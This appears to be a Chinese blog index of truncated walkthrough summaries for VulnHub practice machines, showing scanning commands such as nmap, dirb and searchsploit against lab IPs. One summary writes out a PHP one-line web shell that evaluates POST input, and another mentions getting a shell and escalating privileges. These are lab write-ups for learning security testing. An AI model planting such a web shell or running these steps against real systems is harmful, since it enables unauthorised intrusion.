摘要:靶场地址:Deathnote: 1 ~ VulnHub Kali:172.88.6.144 靶场:172.88.6.92 arp-scan -l nmap -T4 -sV -P -A 172.88.6.92 访问web服务时发现会自动跳转到:http://deathnote.vuln/wordpre
阅读全文
摘要:靶场地址:doubletrouble: 1 ~ VulnHub kali:172.88.6.144 靶场:172.88.6.89 靶场2:172.88.6.91 arp-scan -l nmap -A -sV -T4 -p- 172.88.6.89 访问ip 使用dirsearch对目标站点进行We
阅读全文
摘要:靶场地址:泰雷兹: 1 ~ VulnHub kali:172.88.6.144 靶场:172.88.6.81 nmap 172.88.6.0/24 nmap -T4 -sV -P -A 172.88.6.81 访问http://172.88.6.81:8080/,发现是tomcat页面,登录需要账户
阅读全文
摘要:靶场地址:ICA: 1 ~ VulnHub kali:172.88.6.0/24 靶场:172.88.6.74 nmap 172.88.6.0/24 dirb http://172.88.6.74/ 没有发现啥有用的信息 告诉我们使用的是 qdPM 9.2 系统,查看有没有相关漏洞 searchsp
阅读全文
摘要:靶场下载:Red: 1 ~ VulnHub kali:172.88.6.144 靶场:172.88.6.70 靶场页面是这个,第一次没有找到ip,使用桥接找到了 nmap 172.88.6.0/24 访问ip 找了很久没有找到有用的信息,在查看代码的时候发现了这个,直接打不开,在本地添加host 直
阅读全文
摘要:kali:172.88.6.144 靶场:172.88.6.64 靶场地址:Jangow: 1.0.1 ~ VulnHub 访问ip 点击右上角的buscar 写入一句话:echo '<?php eval($_POST['shell']);?>' > upfine.php 在wordpress里面有
阅读全文
摘要:这次用的是Oracle VM VirtualBox,避免用vmware出现的问题 靶机地址:https://www.vulnhub.com/entry/empire-lupinone,750/ arp-scan -l 扫描ip kali:172.88.6.144 靶场:172.88.6.63/ 1、
阅读全文
摘要:前半部分用的是NAT,然后在用msf的时候,靶场出问题了,应该是用vmware不怎么适合,然后重启用桥接,用nat的内容主要是查看ip和抓包,已经找数据库,桥接部分是os-shell命令、提权、搭建简易的服务器、将文件下载到靶机、最后提权。 用到的工具:openssl、dirb VMware:192
阅读全文
摘要:这个靶场的链接不小心给关闭了,所以只能自己去搜了,好像这个靶场需要用virtualbox,但是我的好像有问题,所以用VMware了,这是我打开后的样子 我的kali的ip:192.168.13.129 对靶场进项扫描 nmap -sP 65535 192.168.13.0/24 稍微判断下,锁定在1
阅读全文
摘要:在不知道靶场的ip情况下进行扫描 出现有几个ip,但是不知道哪个是的,所以就一个个试一试 namp -T4 -sV -A -O -p- 192.168.13.143-T4 (速度) -sV (版本扫描和开启的服务) -O (操作系统) -p-(所有端口) 扫了好几个,只有一个是的,所以不是的就没有发
阅读全文